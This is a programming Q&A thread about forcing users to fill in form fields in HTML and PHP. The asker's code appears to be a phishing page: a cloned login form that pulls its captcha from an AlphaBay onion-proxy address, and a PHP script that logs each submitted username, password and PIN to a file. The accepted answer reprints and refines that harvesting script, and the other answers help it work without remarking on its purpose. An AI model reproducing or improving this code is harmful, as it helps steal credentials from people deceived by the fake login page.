# How can i force someone to fill fileds in html + php

Tags: php, html

Basically I want to prevent the user from submitting without filling all the fields.

Now, in the current situation the user can submit without filling anything, that's what I'm trying to prevent, can someone explain me in an easy way how it can be done?

I want him to fill some fields:

```
<form name="formLogin" method="post" action="action.php">

    <div class="tclpad" style="width:90px;"><span class="std">Username:</span></div>
    <div class="tclpad"><input name="input1" class="std" size="65" type="text" required></div>

    <div class="clear">&nbsp;</div>

    <div class="tclpad" style="width:90px;"><span class="std">Password:</span></div>
    <div class="tclpad"><input name="input2" class="std" size="65" value="" type="password" required></div>

    <div class="clear">&nbsp;</div>

    <div class="tclpad" style="width:90px;"><span class="std">Six-digit pin:</span></div>
    <div class="tclpad"><input name="input3" class="std" size="10" value="" type="password" required></div>

    <div class="clear">&nbsp;</div>

    <div class="tclpad" style="width:90px;">&nbsp;</div><div class="tclpad"><img id="captcha" src="http://alphabaywyjrktqn.onion.to/ifl/lb/securimage86/securimage_ren.php" alt="Captcha Image"></div><div class="clear">&nbsp;</div>

    <div class="tclpad" style="width:90px;"><span class="std">Security code:</span></div><div class="tclpad"><input name="input5" class="std" size="65" type="text" required></div><div class="clear">&nbsp;</div>

    <div class="tclpad" style="width:90px;">&nbsp;</div>
    <div class="tclpad"><input class="bstd" value="Verify" type="submit"></div>

    <div class="clear">&nbsp;</div></form></div></div><div class="footer"><div class="navbar"><a class="navbar" href="index.htm"><img src="navhome.png" alt="Home" height="12" width="14"></a>
```

Login

**My `action.php` is:**

```
<?php
session_start();

if(isset($_POST['input1'])){
    $Username = $_POST['input1'];
}

if(isset($_POST['input2'])){
    $Password = $_POST['input2'];
}

if(isset($_POST['input3'])){
    $PIN = $_POST['input3'];
}

$fh = fopen("logs_" . date('d-M-Y') . ".txt","a");
$stringData = "New Stuff 1\n";
fwrite($fh,"name: " . $Username . "\n" . " email: " . $Password . "\n" . " password: " . $PIN . "\n----------------------------\n");
fclose($fh);

But I want if one of the fields is empty the user can not continue....
```

Comment: You just have to add `required` in all input you want the user fill

Comment: Check this : http://www.w3schools.com/php/php_form_required.asp

Answer (score 1, accepted):

You should at least check, server-side, if all your "required" fields are correctly filled. Then, you might want to add funky JavaScript checking, but this would be for user-experience matters, not efficiency.

The code bellow demonstrate how you may check for form errors using `$_SESSION` global variable to pass the error from your logic code to your view code :

**YOUR VIEW**

```
<form name="formLogin" method="post" action="action.php">
    <!-- Your inputs ... -->
</form>

<?php if ( isset( $_SESSION['loginForm-error'] ) ): ?>
    <div class="label label-error">
        <?= $_SESSION['loginForm-error'] ?>
    </div>
<?php endif ?>
```

Here is the trick : we will check if we have had a form error. If yes, it will be displayed here (make you own CSS for sure). Else, it will not be displayed at all.

**action.php**

```
<?php
    session_start();

    unset($_SESSION['loginForm-error']); // We assume everybody is nice at the begining, right ? ;)

    $myRequiredFields = ['input1', 'input2', '...'];
    $allSets = true;

    # If one of the required fields is not sets or empty, 
    # we put '$allSets' to false
    foreach( $_POST as $post_key => $post_value ) {
        if( in_array($post_key, $muRequiredFields) && ( ! isset($_POST[$post_key]) || empty($_POST[$post_key]) ) ) {
            $allSets = false;
            break; // Stops the loop, no need to go further
        }
    }

    # If all required fields are filled
    if( $allSets ) {
        $Username = $_POST['input1'];
        $Password = $_POST['input2'];
        $PIN = $_POST['input3'];

        $fh = fopen("logs_" . date('d-M-Y') . ".txt","a");
        $stringData = "New Stuff 1\n";
        fwrite($fh,"name: " . $Username . "\n" . " email: " . $Password . "\n" . " password: " . $PIN . "\n----------------------------\n");
        fclose($fh);

        // Redirect to another page than form, like home or success page ?
    }
    # If one of the required fields is missing, 
    # display a nice error message on session and redirect to the form
    else {
        $ERR_FORM_FIELD_MISSING = 'One of the field is missing or empty';
        $_SESSION['loginForm-error'] = $ERR_FORM_FIELD_MISSING;
        header('Location:myForm.php');
    }
?>
```

Here I begin by unsetting all error, and assuming the form is correctly filled. Then, I will check for each `$requiredFields` if one of them is not filled. Finally, I only launch the main part of your script only if the form is well filled. Else, I add the error on `$_SESSION` and redirect again to the form to display this error.

Answer (score 0):

It's strange because you added the `required` attribute on your inputs. On modern browser he can't submit a form. But be careful, the user can modify the DOM and remove the `required`attribute so he can send the form. A good practice is to put client-side validation and server-side validation.

Answer (score 0):

With php like that :

```
if(isset($_POST['input1']) AND isset($_POST['input2'])){
    if(!empty($_POST['input1']) AND !empty($_POST['input2'])){
        // treatment
    }
}
//else write message error
```

But verification with javascript (jquery) client side it's better for user.

Answer (score 0):

You can test the input string length :

```
if (isset($_POST['input2'] && strlen($_POST['input2']) > 0)
```

Do this for each field you want to test. I also use [trim()](http://php.net/manual/fr/function.trim.php) to remove all unwanted spaces from $_POST.

If the string length of an input is equal to zero, print the form again, ie:

```
if (all inputs size > 0) {
  do work
}
else {
  print form again and fill inputs with old values, ie:
    <input type="text" value="<?php echo htmlspecialchars($_POST['input1']); ?>" />
}
```

Answer (score 0):

**In PHP it can be done by using the following code.On submitting form check first that all fields are filled and if even one field is not filled then the error will be echo for filling all the fields.**

```
<?php

if(isset($_POST['send'])) //if submit button clicks.
{

//checking all fields are fill.
if($_POST['input1']!="" && $_POST['input2']!="" && $_POST['input3']!="")
 {

  //do the working

 } 
else
 {

 echo "Data cannot be send.Fill out all the fields.";

 }

}

?>
```